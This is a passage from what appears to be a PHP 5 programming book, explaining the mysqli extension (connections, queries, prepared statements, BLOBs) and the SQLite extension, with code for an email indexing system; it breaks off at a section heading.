If you bundle MySQL (server or client) with a commercial closed-source product, you need to purchase a license. MySQL AB has published a FOSS (Free or Open-Source Software) exception to MySQL’s license that grants all free or open-source products an exception from this restriction.

6.2.1.6 Strength: Reasonable Scalability
MySQL used to be a lightweight database that did not have to drag around most of the expensive reliability features (such as transactions) of systems such as Oracle or IBM DB2. This was, and still is, one of the most important reasons for MySQL’s high performance. Today, MySQL has evolved to almost match its commercial seniors in scalability and reliability, but you can still configure it for lightweight use.

6.2.2 PHP Interface

The mysqli PHP extension was written from the ground up to support the new features of the MySQL 4.1 and 5.0 Client API. The improvements from the old mysql extension include the following:

☞ Native bind/prepare/execute functionality
☞ Cursor support
☞ SQLSTATE error codes
☞ Multiple statements from one query
☞ Index analyzer

The following sections give an overview of how to use the mysqli extension, and how it differs from the old mysql extension.

Almost every mysqli function has a method or property counterpart, and the following list of functions describes both of them. The notation for the methods is similar to $mysqli->connect() for regular methods, calling connect() in an instance of the mysqli class.

The parameter list is usually the same between mysqli functions and methods, except that functions in most cases have an object parameter first. Following that, function parameter lists are identical to those of their method counterparts. For the sake of brevity, ... replaces the method parameter list in the parameter descriptions.

6.2.3 Example Data

This section uses data from the “world” example database, available at http://dev.mysql.com/get/Downloads/Manual/world.sql.gz/from/pick.

6.2.4 Connections

Table 6.1 shows the mysqli functions that are related to connections.

Table 6.1 mysqli Connection Functions and Methods

Function Name
    Description

mysqli_connect(...)
$mysqli = new mysqli(...)
    Opens a connection to the MySQL server. Parameters (all are optional):
    • host name (string)
    • user name (string)
    • password (string)
    • database name (string)
    • TCP port (integer)
    • UNIX domain socket (string)

mysqli_init()
$mysqli = new mysqli
    Initializes MySQLi and returns an object for use with mysqli_real_connect

mysqli_options(...)
$mysqli->options(...)
    Sets various connection options

mysqli_real_connect(...)
$mysqli->real_connect(...)
    Opens a connection to the MySQL server

mysqli_close(...)
$mysqli->close()
    Closes a MySQL server connection. The parameter is the connection object (function only)

mysqli_connect_errno()
    Obtains the error code of the last failed connect

mysqli_connect_error()
    Obtains the error message of the last failed connect

mysqli_get_host_info(...)
$mysqli->host_info
    Returns a string telling what the connection is connected to

Here is a simple example:

    <?php
    $mysqli = new mysqli("localhost", "test", "", "world");
    if (mysqli_connect_errno()) {
        die("mysqli_connect failed: " . mysqli_connect_error());
    }
    print "connected to " . $mysqli->host_info . "\n";
    $mysqli->close();

Sometimes, you might need some more options when connecting to a MySQL server. In this case, you can use the mysqli_init, mysqli_options, and mysqli_real_connect functions, which allow you to set different options for your database connection. The following example demonstrates how you can use these functions:

    <?php
    $mysqli = mysqli_init();
    $mysqli->options(MYSQLI_INIT_CMD, "SET AUTOCOMMIT=0");
    $mysqli->options(MYSQLI_READ_DEFAULT_FILE, "SSL_CLIENT");
    $mysqli->options(MYSQLI_OPT_CONNECT_TIMEOUT, 5);
    $mysqli->real_connect("localhost", "test", "", "world");
    if (mysqli_connect_errno()) {
        die("mysqli_connect failed: " . mysqli_connect_error());
    }
    print "connected to " . $mysqli->host_info . "\n";
    $mysqli->close();

The mysqli_options functions allow you to set the options shown in Table 6.2.

Table 6.2 mysqli_options Constants

Option
    Description

MYSQLI_OPT_CONNECT_TIMEOUT
    Specifies the connection timeout in seconds

MYSQLI_OPT_LOCAL_INFILE
    Enables or disables the use of the LOAD DATA LOCAL INFILE command

MYSQLI_INIT_CMD
    Specifies the command that must be executed after connect

MYSQLI_READ_DEFAULT_FILE
    Specifies the name of the file that contains named options

MYSQLI_READ_DEFAULT_GROUP
    Reads options from the named group from my.cnf (or the file specified with MYSQLI_READ_DEFAULT_FILE)

6.2.5 Buffered Versus Unbuffered Queries

The MySQL client has two types of queries: buffered and unbuffered queries. Buffered queries will retrieve the query results and store them in memory on the client side, and subsequent calls to get rows will simply spool through local memory.

Buffered queries have the advantage that you can seek in them, which means that you can move the “current row” pointer around in the result set freely because it is all in the client. Their disadvantage is that extra memory is required to store the result set, which could be very large, and that the PHP function used to run the query does not return until all the results have been retrieved.

Unbuffered queries, on the other hand, limit you to a strict sequential access of the results but do not require any extra memory for storing the entire result set. You can start fetching and processing or displaying rows as soon as the MySQL server starts returning them. When using an unbuffered result set, you have to retrieve all rows with mysqli_fetch_row or close the result set with mysqli_free_result before sending any other command to the server.

Which type of query is best depends on the situation. Unbuffered queries save you a lot of temporary memory when the result set is large, and if the query does not require sorting, the first row of results will be available in PHP while the MySQL database is actually still processing the query. Buffered queries are convenient because of the seeking feature, and they could provide an overall speedup: each individual query would finish faster, because the mysqli extension drains the result set immediately and stores it in memory instead of keeping the query active while processing PHP code. With some experience and relentless benchmarking, you will figure out what is best for you.

Another limitation for unbuffered queries is that you will not be able to send any command to the server unless all rows are read or the result set is freed by mysqli_free_result.

6.2.6 Queries

This section describes functions and methods for executing queries (see Table 6.3).

Table 6.3 mysqli Query Functions

Function Name
    Description

mysqli_query(...)
    Sends a query to the database and returns a result object. Parameters:
    • connection (function only)
    • query (string)
    • mode (buffered or unbuffered)

mysqli_multi_query(...)
$mysqli->multi_query(...)
    Sends and processes multiple queries at once. Parameters:
    • connection object (function only)
    • query (string)

The mysqli_query() function returns a result set object. On failure, use the mysqli_error() function or the $conn->error property to determine the cause of the failure:

    <?php
    $conn = mysqli_connect("localhost", "test", "", "world");
    $result = $conn->query("SELECT Name FROM City");
    while ($row = $result->fetch_row()) {
        print $row[0] . "<br />\n";
    }
    $result->free();
    $conn->close();

After the query has been executed, memory on the client side is allocated to retrieve the complete result set. To use an unbuffered result set, you have to specify the optional parameter MYSQLI_USE_RESULT:

    <?php
    $conn = mysqli_connect("localhost", "test", "", "world");
    $result = $conn->query("SELECT Name FROM City", MYSQLI_USE_RESULT);
    while ($row = $result->fetch_row()) {
        print $row[0] . "<br />\n";
    }
    $result->free();
    $conn->close();

6.2.7 Multi Statements

The mysqli extension enables you to send multiple SQL statements in one function call by using mysqli_multi_query. The query string contains one or more SQL statements, each terminated by a semicolon. Retrieving result sets from multi statements is a little bit tricky, as the following example demonstrates:

    <?php
    ...
    if ($conn->multi_query($query)) {
        do {
            if ($result = $conn->store_result()) {
                while ($row = $result->fetch_row()) {
                    printf("Col: %s\n", $row[0]);
                }
                $result->close();
            }
        } while ($conn->next_result());
    }
    $conn->close();

6.2.8 Fetching Modes

There are three ways to fetch rows of results, as in the old mysql extension: as an enumerated array, as an associative array, or as an object (see Table 6.4).

Table 6.4 mysqli Fetch Functions

Function Name
    Description

mysqli_fetch_row(...)
$result->fetch_row()
    Fetches a row as an enumerated array. Its parameter is the result object (function only).

mysqli_fetch_assoc(...)
$result->fetch_assoc()
    Fetches a row as an associative array. Its parameter is the result object (function only).

mysqli_fetch_object(...)
$result->fetch_object()
    Fetches a row into an object. Its parameter is the result object (function only).

6.2.9 Prepared Statements

One of the major advantages of the mysqli extension as compared to the mysql extension is prepared statements. Prepared statements provide developers with the ability to create queries that are more secure, have better performance, and are more convenient to write.

There are two types of prepared statements: one that executes data manipulation statements, and one that executes data retrieval statements. Prepared statements allow you to bind PHP variables directly for input and output.

Creating a prepared statement is simple. A query template is created and sent to the MySQL server. The MySQL server receives the query template, validates it to ensure that it is well-formed, parses it to ensure that it is meaningful, and stores it in a special buffer. It then returns a special handle that can later be used to reference the prepared statement.

6.2.9.1 Binding Variables
There are two types of bound variables: input variables that are bound to the statement, and output variables that are bound to the result set. For input variables, you need to specify a question mark as a placeholder in your SQL statement, like this:

    SELECT Id, Country FROM City WHERE City=?
    INSERT INTO City (Id, Name) VALUES (?,?)

Output variables can be bound directly to the columns of the result set. The procedure for binding input and output variables is slightly different. Input variables must be bound before executing a prepared statement, while output variables must be bound after executing the prepared statement.

The process for input variables is as follows:

1. Preparing (parsing) the statement
2. Binding input variables
3. Assigning values to bound variables
4. Executing the prepared statement

The process for output variables is as follows:

1. Preparing (parsing) the statement
2. Executing the prepared statement
3. Binding output variables
4. Fetching data into output variables

Executing a prepared statement or fetching data from a prepared statement can be repeated multiple times until the statement is closed or there is no more data to fetch (see Table 6.5).

Table 6.5 mysqli Prepared Statement Functions

Function Name
    Description

mysqli_prepare(...)
$mysqli->prepare()
    Prepares a SQL statement for execution. Parameters:
    • Connection object (function only)
    • Statement

mysqli_stmt_bind_result(...)
$stmt->bind_result(...)
    Binds variables to a statement's result set. Parameters:
    • Statement object (function only)
    • Variables

mysqli_stmt_bind_param(...)
$stmt->bind_param(...)
    Binds variables to a statement. Parameters:
    • Statement object (function only)
    • String that specifies the type of each variable (i=integer, s=string, d=double, b=blob)
    • Variables

mysqli_stmt_execute(...)
$stmt->execute()
    Executes a prepared statement. Its parameter is the statement object (function only).

mysqli_stmt_fetch(...)
$stmt->fetch()
    Fetches data into output variables. Its parameter is the statement object (function only).

mysqli_stmt_close(...)
$stmt->close()
    Closes a prepared statement.
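The type string passed to bind_param() carries one character per bound variable, in the same order as the placeholders. As a minimal sketch of how the characters line up with PHP values, the following uses a hypothetical helper, bind_types(), which is not part of mysqli and exists only for illustration. It maps integers to i, floating-point values to d, and everything else to s; blobs (b) are not inferred.

```php
<?php
// Hypothetical helper, NOT part of mysqli: derives a bind_param() type
// string from a list of sample PHP values.
function bind_types($values)
{
    $types = '';
    foreach ($values as $value) {
        if (is_int($value)) {
            $types .= 'i';      // integer
        } elseif (is_float($value)) {
            $types .= 'd';      // double
        } else {
            $types .= 's';      // anything else is sent as a string
        }
    }
    return $types;
}

// One character per value, in placeholder order.
echo bind_types(array(2001, '156 2.0 Selespeed', 8.6)), "\n";
```

In a real script the type string is usually written out by hand, because the column types are known when the statement is prepared.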

Here is an example of a data manipulation query using bound input variables:

    <?php
    $conn = mysqli_connect("localhost", "test", "", "world");
    $conn->query("CREATE TABLE alfas ".
        "(year INTEGER, model VARCHAR(50), accel REAL)");

    // one placeholder per bound variable
    $stmt = $conn->prepare("INSERT INTO alfas VALUES(?, ?, ?)");
    $stmt->bind_param("isd", $year, $model, $accel);

    $year = 2001;
    $model = '156 2.0 Selespeed';
    $accel = 8.6;
    $stmt->execute();

    $year = 2003;
    $model = '147 2.0 Selespeed';
    $accel = 9.3;
    $stmt->execute();

    $year = 2004;
    $model = '156 GTA Sportwagon';
    $accel = 6.3;
    $stmt->execute();

Here is an example of using binding for retrieving data:

    <?php
    $conn = mysqli_connect("localhost", "test", "", "world");
    $stmt = $conn->prepare("SELECT * FROM alfas ORDER BY year");
    $stmt->execute();
    $stmt->bind_result($year, $model, $accel);
    print "<table>\n";
    print "<tr><th>Model</th><th>0-100 km/h</th></tr>\n";
    while ($stmt->fetch()) {
        print "<tr><td>$year $model</td><td>{$accel} sec</td></tr>\n";
    }
    print "</table>\n";

Here, we bind $year, $model, and $accel to the columns of the "alfas" table. Each $stmt->fetch() call modifies these variables with data from the current row. The fetch() method returns TRUE until there is no more data, then it returns NULL (FALSE signals an error).

6.2.10 BLOB Handling

BLOB stands for Binary Large OBject and refers to binary data, such as JPEG images stored in the database.

6.2.10.1 Inserting BLOB Data
Previously, with the mysql PHP extension, BLOB data was inserted into the database directly as part of the query. You can still do this with mysqli, but when you insert several kilobytes or more, a more efficient method is to use the mysqli_stmt_send_long_data() function or the send_long_data() method of the stmt class.

Here is an example:

    <?php
    $conn = mysqli_connect("localhost", "test", "", "world");
    $conn->query("CREATE TABLE files (id INTEGER PRIMARY KEY AUTO_INCREMENT, ".
        "data BLOB)");
    $stmt = $conn->prepare("INSERT INTO files VALUES(NULL, ?)");
    // "b" marks the parameter as a blob that is sent in chunks
    $stmt->bind_param("b", $data);
    $file = "test.jpg";
    $fp = fopen($file, "rb");
    $size = 0;
    while ($data = fread($fp, 1024)) {
        $size += strlen($data);
        $stmt->send_long_data(0, $data);
    }
    fclose($fp);
    //$data = file_get_contents("test.jpg");
    if ($stmt->execute()) {
        print "$file ($size bytes) was added to the files table\n";
    } else {
        die($conn->error);
    }

In this example, the test.jpg file is inserted into the files table by transferring 1,024 bytes at a time to the MySQL server with the send_long_data() method. This technique does not require PHP to buffer the entire BLOB in memory before sending it to MySQL.

6.2.10.2 Retrieving BLOB Data
Retrieving BLOB data is the same as retrieving regular data. Use any of the fetch function/method variants as you see fit. Here is an example:

    <?php
    $conn = mysqli_connect("localhost", "test", "", "world");
    if (empty($_GET['id'])) {
        $result = $conn->query("SELECT id, length(data) FROM files LIMIT 20");
        if ($result->num_rows == 0) {
            print "No images!\n";
            print "Click here to add one\n";
            exit;
        }
        while ($row = $result->fetch_row()) {
            print "<a href=\"?id=$row[0]\">";
            print "image $row[0] ($row[1] bytes)</a><br />\n";
        }
        exit;
    }
    $stmt = $conn->prepare("SELECT data FROM files WHERE id = ?");
    $stmt->bind_param("i", $_GET['id']);
    $stmt->execute();
    $data = null;
    $stmt->bind_result($data);
    if (!$stmt->fetch()) {
        die("No such image!");
    }
    header("Content-type: image/jpeg");
    print $data;

6.3 SQLITE

PHP 5 introduced a new bundled “database” engine, available by default, called SQLite.

6.3.1 SQLite Strengths and Weaknesses

This section describes the characteristics of SQLite compared to other DBMSs.

6.3.1.1 Strength: Self-Contained, No Server Required
SQLite does not use a client/server model. It is embedded in your application, and only requires access to the database files. This makes integrating SQLite into other applications easier because there is no dependency on an external service.

6.3.1.2 Strength: Easy to Get Started
Setting up a new database with SQLite is easy and requires no intervention from system administrators.

6.3.1.3 Strength: Bundled with PHP 5
The entire SQLite engine is bundled with PHP 5. There is no need to install extra packages to make it available to PHP developers.

6.3.1.4 Strength: Lightweight and Fast
The newest of the databases covered in this chapter, SQLite has little compatibility baggage and still has a lean and light design. For most queries, it is on par with or exceeds the performance of MySQL.

6.3.1.5 Strength: Both a Procedural and an OO Interface
SQLite’s PHP extension features both procedural interfaces and an object-oriented interface. The latter makes it possible to have less code, and is, in some cases, faster than its procedural alternative.

6.3.1.6 Weakness: No Server Process
Although this is one of SQLite's strong points, the fact that SQLite has no server process leads to a series of scaling difficulties: file locking and concurrency issues, lack of persistent query caches, and scaling problems when handling very large data volumes.

Also, the only way to share a database between hosts is to share the file system with the database file. This way of running remote queries is much slower than sending queries and responses through a network socket, as well as less reliable.

6.3.1.7 Weakness: Not Binary Safe
SQLite does not handle binary data natively. To put binary data in a SQLite database, you first need to encode it. Likewise, after a SELECT, you need to decode the encoded binary data.

6.3.1.8 Weakness: Transactions Lock All Tables
Most databases lock individual tables (or even only rows) during transactions, but because of its implementation, SQLite locks the whole database on inserts, which makes concurrent read/write access dramatically slow.

6.3.2 Best Areas of Use

SQLite’s primary point of excellence is that it is standalone and extremely well suited for web-hosting environments. Because the SQLite client works on files, there is no need to maintain a second set of credentials for database access; if you can write to the database file, you can make changes in the database. Hosting companies just need to support the SQLite PHP extension, and their customers can take care of the rest.

A hosting company can limit the maximum size of databases (in combination with other data in the web space) easily because the SQLite database is just a file that takes space inside the web space of its customer.

SQLite excels at standalone applications. Its speed shows best in web-hosting environments where there are many read queries and few write queries. An example of such an application might be a weblog where all hits pull out comments from the database, but where only a few comments are added.

6.3.3 PHP Interface

In this section, we present a full-fledged example using most of SQLite's feature sets. Each subsection introduces you to a new step in building an automatic indexed email storage system. We use the OO-based API in the examples, but also mention the procedural equivalent. The way this works is similar to the MySQLi extension.

6.3.3.1 Setting Up Databases
Because SQLite doesn’t require a daemon to function, setting up a database is in fact nothing more than creating a specially formatted file. To create a new database, you simply try to open one; if the database does not exist, a new one will be created for you. That’s the reason why the second parameter to the constructor can be used to specify the permissions for the created database.

The example script we start with is the create.php script, which creates the database and all tables inside our database (see Table 6.6).

Table 6.6 Opening and Closing Databases

Function Name
    Description

sqlite_open(...)
$sqlite = new SQLiteDatabase(...)
    Connects the script to an SQLite database, or creates one if none exists yet. Parameters:
    • The path and file name (string)
    • Permissions in UNIX chmod style (octal number)
    • Error message (by-reference, string)

sqlite_close(...)
    Disconnects the script from an SQLite database connection. The parameter is the SQLite descriptor.

You can also create in-memory databases by using the special keyword ":memory:" as the first parameter to the SQLiteDatabase constructor. This allows for ultra-fast temporary SQL power. Do not forget to store your data somewhere else before ending a script; if you do not, the data you put into the database is gone. Here’s an example:

    <?php
    $db = new SQLiteDatabase(":memory:");
    ?>

6.3.3.2 Simple Queries
When the database is opened, we can start executing queries on the database. Because no tables are available in a new database, we have to create them first. The following example explains how to do this:

    <?php
    ...
    $db->query($create_query);
    ?>

If you are familiar with other database systems, you will most likely notice the absence of types for some of the field definitions in the CREATE TABLE queries shown earlier. SQLite actually has only two types internally: INTEGER, which is used to store numbers, and "something else", which can be compared to a VARCHAR field in other databases. SQLite’s VARCHAR can store more than 255 characters, though, which is sometimes a limitation in other database systems. You can also make an INTEGER field auto-increment by adding "PRIMARY KEY" as a postfix to the field definition. Of course, you can do this for only one field per table.

Something else that you might notice is that we execute multiple CREATE TABLE queries with one function call to the query() method. This is often not possible with other PHP interfaces to other database systems, such as the MySQL (not MySQLi) extension.

6.3.3.3 Error Handling
SQLite’s error handling is a bit flaky because each of the query functions might throw a warning. It is therefore important to prepend the query functions with the “shut-up” operator @. The result of the function then needs to be checked against FALSE to see if the query succeeded. If it did not succeed, you can use sqlite_last_error() and sqlite_error_string() to retrieve a textual description of the error. Unfortunately, this error message is not very descriptive, either.

SQLite’s constructor might also throw an SQLiteException, which you need to handle yourself (with a try...catch block). There will be some future work on SQLite’s error handling, but that’s likely something for PHP 5.1.

6.3.3.4 Simpler Queries and Transactions
By creating only the tables, our email indexer still does nothing useful, so the next step is to add the emails into our database. We do that in a new script called "insert.php". Here is part of its code:

    <?php
    ...
    if ($argc != 2) {
        echo "...\n\n";
        return;
    }

First, we open the database and check if the number of parameters to this command-line script is correct. The first (and only) parameter passed to this script is the mailbox (in the UNIX MBOX format) we’re going to store and later index.

    $body = file_get_contents($argv[1]);
    $mails = preg_split('/^From /m', $body);
    unset($body);

We load the mailbox into memory and split it into separate emails with a regular expression. You might wonder what happens if a line in an email starts with "From "; in this case, the UNIX MBOX format requires this line to be escaped with the > character.

    // $db->query("BEGIN");
    foreach ($mails as $id => $mail) {
        $safe_mail = sqlite_escape_string($mail);
        $insert_query = "
            INSERT INTO document(title, intro, body)
            VALUES ('Title', 'This is an intro.', '{$safe_mail}')
        ";
        echo "Indexing mail #$id.\n";
        $db->query($insert_query);
    }
    // $db->query("COMMIT");
    ?>

Here, we loop over the mails, making sure we escape all possible dangerous characters with the sqlite_escape_string() function, and insert the data into the database with the query() method.
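The mailbox-splitting step can be tried without a database. The following is a minimal sketch on a made-up two-message mailbox (the addresses and text are assumptions for illustration). It also passes PREG_SPLIT_NO_EMPTY, which the listing above does not use, so that the empty string in front of the first "From " separator is dropped.

```php
<?php
// Hypothetical two-message mailbox in MBOX format.
$body = "From alice@example.com Thu Sep 23 09:05:00 2004\n"
      . "Subject: first\n"
      . "\n"
      . "Hello.\n"
      . ">From here on, this line is ordinary message text.\n"
      . "From bob@example.com Thu Sep 23 09:06:00 2004\n"
      . "Subject: second\n"
      . "\n"
      . "Bye.\n";

// The /m modifier lets ^ match at the start of every line, so the string
// is cut wherever a line begins with "From ". The escaped ">From" line
// does not start with "From " and therefore stays inside its message.
$mails = preg_split('/^From /m', $body, -1, PREG_SPLIT_NO_EMPTY);

foreach ($mails as $id => $mail) {
    echo "mail #$id: ", strlen($mail), " bytes\n";
}
```

Without PREG_SPLIT_NO_EMPTY, a mailbox that starts with a "From " line yields an empty first element, which the loop in insert.php would store as an empty document.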

Table 6.7 sqlite Quoting Function

Function Name
    Description

sqlite_escape_string(...)
    Escapes a string for use as parameter to a query

By default, SQLite commits all queries directly to disk, which makes running many insert queries rather slow. Another problem that might arise is that other processes can insert data into the database during the process of importing our emails. To fix those two problems, you can simply use a transaction to perform the entire import. To start a transaction, you can execute a query containing "BEGIN TRANSACTION" or simply "BEGIN". At the end of the transaction, you can use the "COMMIT" query to commit all queries in the transaction to disk. In the full example (including the tricks we discuss later in this section), the time for importing 638 emails dropped from 60m29s to 1m59s, which is quite a speed boost.

6.3.3.5 Triggers
SQLite has some advanced features; for example, it supports triggers. Triggers can be set to data-modifying queries, and consist of a small SQL script that runs whenever the specified action is “triggered.” Our example will use triggers to automatically update our search index whenever a new document is added. To define the trigger, we extend our create.php script and add the following code to the file:

    ...
    $trigger_query = "
        CREATE TRIGGER index_new
        AFTER INSERT ON document
        BEGIN
            SELECT php_index(new.id, new.title, new.intro, new.body);
        END;";
    $db->query($trigger_query);
    ?>

This creates a trigger named index_new to be run after an insert query on the document table. The SQL script that runs when the trigger fires is a simple select query, but that query is not as simple as it appears. You can see that there is no FROM clause, nor is the php_index() function a function defined in the SQL standard. This brings us to the next cool feature of SQLite: User-Defined Functions.

6.3.3.6 User-Defined Functions (UDFs)
Because SQLite is Lite, it does not implement all the default SQL functions, but SQLite does provide you with the possibility to write your own functions that you then can use from your SQL queries.

Table 6.8 sqlite UDF Functions

Function Name
    Description

sqlite_create_function(...)
$sqlite->createFunction(...)
    Binds an SQL function to a user-defined function in your PHP script. Parameters:
    • DB handle (procedural only)
    • SQL function name (string)
    • PHP function name (string)
    • Number of arguments to the function (integer, optional)

We’re adding this function registration call after the argument check in insert.php:

    ...
    $db->createFunction("php_index", "index_document", 4);
    ...

Of course, we create this new PHP function index_document. We place this function, with another helper function, at the start of our script:

    function normalize($body)
    {
        $body = strtolower($body);
        $body = preg_replace(
            '/[.;,:!?¿¡\[\]@\(\)]/', ' ', $body);
        $body = preg_replace('/[^a-z0-9 -]/', '_', $body);
        return $body;
    }

This helper function lowercases the text, changes punctuation marks to spaces, and replaces every other unwanted character with an underscore. It is used to normalize the words we put into our search index. After the helper function, our main function begins as follows:

    function index_document($id, $title, $intro, $body)
    {
        global $db;

Because this function is called through SQLite, we need to import our database handle into the function’s scope; we do that with the global keyword.

        $id = $db->singleQuery("SELECT max(id) from document");

Because of a bug in the SQLite library, we have to figure out the latest auto-increment value ourselves because we cannot trust the value passed through our callback function by SQLite. Using the PHP function sqlite_last_insert_row_id() (or the OO variant lastInsertRowId()) did not work here, either.

        $body = substr($body, 0, 32000);
        $body = normalize($body);

Here, we reduce the body to roughly 32KB (32,000 bytes) because emails larger than this usually have an attachment, which is not important to put into our index. After that, the text is normalized so that we can make a nice search index out of it:

        $words = preg_split(
            '@([\W]+)@', $body, -1,
            PREG_SPLIT_OFFSET_CAPTURE |
            PREG_SPLIT_NO_EMPTY
        );

This regular expression splits the body into words and calculates their position in the message (you can find more about regular expressions in Chapter 9, “Mainstream Extensions”).

        foreach ($words as $word) {
            $safe_word = sqlite_escape_string($word[0]);
            if ((strpos($safe_word, '_') === false) &&
                (strlen($safe_word) < 24))
            {

Here, we start looping over all the words that the regular expression created. We escape the word, and enter the index section of this function only if there is no underscore present in the word and it is shorter than 24 characters.

                $result = @$db->query(
                    "INSERT INTO dictionary(word) ".
                    "VALUES('$safe_word');");
                if ($result === false) {
                    /* already exists, need to fetch the
                     * ID then */
                    $word_id = $db->singleQuery(
                        "SELECT id FROM dictionary ".
                        "WHERE word = '$safe_word'");
                } else {
                    $word_id = $db->lastInsertRowId();
                }

Here, we insert our word into the dictionary table, relying on the unique key of the word to prevent duplicate entries. In case the word already exists in the dictionary, the query will fail and we run a SELECT query to obtain the ID of the word with the singleQuery() method; otherwise, we request the ID with which the new word was inserted into the database. The singleQuery() method runs the query, and returns the first column of the first record returned by the query.

                $db->query(
                    "INSERT INTO ".
                    "lookup(document_id, word_id, position) ".
                    "VALUES($id, $word_id, {$word[1]})");
            }
        }
    }
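The tokenizing part of index_document() can be exercised without a database. The sketch below wraps the same three steps (normalize, split with offsets, filter) in a hypothetical function named tokenize(), which is not part of the original script. Two simplifications are assumptions of this sketch: the sqlite_escape_string() call is left out, and the character class in normalize() is reduced to ASCII punctuation so the result does not depend on the file encoding.

```php
<?php
// Trimmed copy of the helper from the listing above (ASCII punctuation only).
function normalize($body)
{
    $body = strtolower($body);
    $body = preg_replace('/[.;,:!?\[\]@\(\)]/', ' ', $body);
    $body = preg_replace('/[^a-z0-9 -]/', '_', $body);
    return $body;
}

// Hypothetical wrapper: returns array(word, byte offset) pairs for every
// word that would reach the dictionary and lookup tables.
function tokenize($body)
{
    $body  = normalize(substr($body, 0, 32000));
    $words = preg_split(
        '@([\W]+)@', $body, -1,
        PREG_SPLIT_OFFSET_CAPTURE | PREG_SPLIT_NO_EMPTY
    );

    $kept = array();
    foreach ($words as $word) {
        // $word[0] is the text, $word[1] its offset in the normalized body.
        if (strpos($word[0], '_') === false && strlen($word[0]) < 24) {
            $kept[] = array($word[0], $word[1]);
        }
    }
    return $kept;
}

foreach (tokenize("Hello, World! PHP_5 rocks.") as $pair) {
    echo $pair[1], "\t", $pair[0], "\n";
}
```

The word "php_5" is skipped because it contains an underscore, which is the same rule that keeps words with unexpected characters out of the index.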

When we know the ID of the word, we insert it with the document_id and the position into the lookup table (see Table 6.9).

Table 6.9 sqlite_last_insert_row_id and sqlite_single_query

Function Name
    Description

sqlite_last_insert_row_id(...)
$sqlite->lastInsertRowId()
    Returns the ID of the last inserted data in an auto-increment column. The procedural version requires the database handle as its only parameter.

sqlite_single_query(...)
$sqlite->singleQuery(...)
    Executes a query and returns the first column of the first record. Parameters:
    • The database handle (function only)
    • The query to execute (string)

6.3.3.7 Other Querying Functions
The singleQuery() method is one of many specialized functions for data retrieval. They are added for performance reasons, and there are a few more than we’ve already seen (see Table 6.10).

Table 6.10 Query Functions and Methods

Function Name
    Returns; Description

sqlite_query()
$sqlite->query()
    handle; Executes a simple query.

sqlite_unbuffered_query()
$sqlite->unbufferedQuery()
    handle; Executes a query, but does not buffer the result in the client.

sqlite_exec()
$sqlite->queryExec()
    boolean; Executes a chained query (multiple queries separated by a ;) without result.

sqlite_array_query()
$sqlite->arrayQuery()
    data; Executes a query and returns an array with all rows and columns in a two-dimensional array.

sqlite_single_query()
$sqlite->singleQuery()
    data; Executes a query and returns the first column of the first returned record.

6.3.3.8 Fetching Data
For the two functions that return handles to the resource, there is a complementary group of functions to actually fetch the data (see Table 6.11).

Table 6.11 Fetching Functions and Methods

| Function Name | Description |
|---|---|
| sqlite_fetch_array() / $sqlite->fetch() | Returns the next row as an array. Parameters: result resource (function only); mode (SQLITE_ASSOC, SQLITE_NUM, or SQLITE_BOTH). |
| sqlite_fetch_object() / $sqlite->fetchObject() | Returns the next row as an object with a chosen class. Parameters: result resource (function only); class name (string); parameters to the constructor (array). |
| sqlite_fetch_single() / sqlite_fetch_string() / $sqlite->fetchSingle() | Returns the first column of the next row. Its parameter is the result resource (functions only). |
| sqlite_fetch_all() / $sqlite->fetchAll() | Returns the whole result set as a two-dimensional array. Parameters: result resource (functions only); the mode (SQLITE_ASSOC, SQLITE_NUM, or SQLITE_BOTH). |

The mode parameter determines how a result will be returned. When the SQLITE_ASSOC mode is used, the returned array will have the fields indexed by field name. When SQLITE_NUM is used, the fields will be indexed by a field number only. When SQLITE_BOTH is used, there will be a numerical index and a field name index for each field in the returned array.

One of the more interesting fetch functions is $sqlite->fetchObject(), and thus, we present a small example here (which has nothing to do with our email indexing scripts):

    [...] intro);
            $db->query(
                "UPDATE document SET intro = '$intro' ".
                "WHERE id = {$this->id}");
        }
    }

This is our class definition with only two interesting things to mention. The names of the properties are the same as the names of the fields in the database. This way, they will be automatically filled in, regardless of the property visibility level. As you can see, only the intro field is a public property. The second interesting part is the save() method that executes an update query with the new intro data. It uses the stored $id property to update the correct record.

    $result = $db->query(
        "SELECT * FROM document WHERE body LIKE '%conf%'");
    $obj1 = $result->fetchObject('Article', NULL);

Here, we execute our query and fetch the first record as an object of class Article. We pass NULL for the constructor parameters, because the class does not use any.

    $obj1->intro = "This is a changed intro";
    $obj1->save($db);
    ?>

This last part of the code changes the intro property of the object and then calls the save() method to save the changed data into the database.

6.3.3.9 Iterators

There is another way to navigate through a result set, and that is with an iterator. Using an iterator to iterate over the result set does not involve calling any functions, so it is a bit faster than using one of the fetch functions. In this example, we present the search.php script to find an email matching certain words:

    [...] \n\n";
        return;
    }

    function escape_word(&$value)
    {
        $value = sqlite_escape_string($value);
    }

    $search_words = array_splice($argv, 1);
    array_walk($search_words, 'escape_word');
    $words = implode("', '", $search_words);

The parameters that are passed to the script are the search words, which we, of course, need to escape with the sqlite_escape_string() function. In the preceding code, we use the array_walk() function to iterate over the array and escape the words.
After they are escaped, we construct a list of them to use in the queries with the implode() function.
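The escape-then-implode step can be tried without a database. The following is a minimal sketch; because sqlite_escape_string() needs the SQLite extension, the callback below uses a stand-in that only doubles single quotes, which is an assumption made for illustration and not the extension's implementation. The sample search words are made up as well.

```php
<?php
// Stand-in for sqlite_escape_string(): doubles single quotes only.
// Assumption for illustration; use the real function with a real database.
function escape_word(&$value)
{
    $value = str_replace("'", "''", $value);
}

// Hypothetical search words, as they might arrive in $argv.
$search_words = array("php", "o'reilly", "sqlite");
array_walk($search_words, 'escape_word');

// Joining with "', '" means that wrapping the result in one more pair
// of quotes yields a complete, comma-separated list of SQL literals.
$words = implode("', '", $search_words);
$where = "word IN ('$words')";

echo $where, "\n";
```

The callback takes its argument by reference, which is what lets array_walk() change the array elements in place.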

    $search_query = "
        SELECT document_id, COUNT(*) AS cnt
        FROM dictionary d, lookup l
        WHERE d.id = l.word_id
            AND word IN ('$words')
        GROUP BY document_id
        ORDER BY cnt DESC
        LIMIT 10
    ";
    $doc_ids = array();
    $rank = $db->query($search_query, SQLITE_NUM);
    foreach ($rank as $key => $row) {
        $doc_ids[$key] = $row[0];
    }
    $doc_ids = implode(", ", $doc_ids);
    ...

Next, we execute the query with the query() method that returns a result handle. With the foreach loop, we iterate over the result just as we would iterate over an array, except that we don't actually create an array first. The iterator tied to the SQLite buffered query object fetches the data for us row by row. Ideally, we would use an unbuffered query here, but we can't do that because we need to reuse this result set; reusing a result set is not possible with an unbuffered query because the data is not buffered.

6.3.3.10 Homegrown Iteration

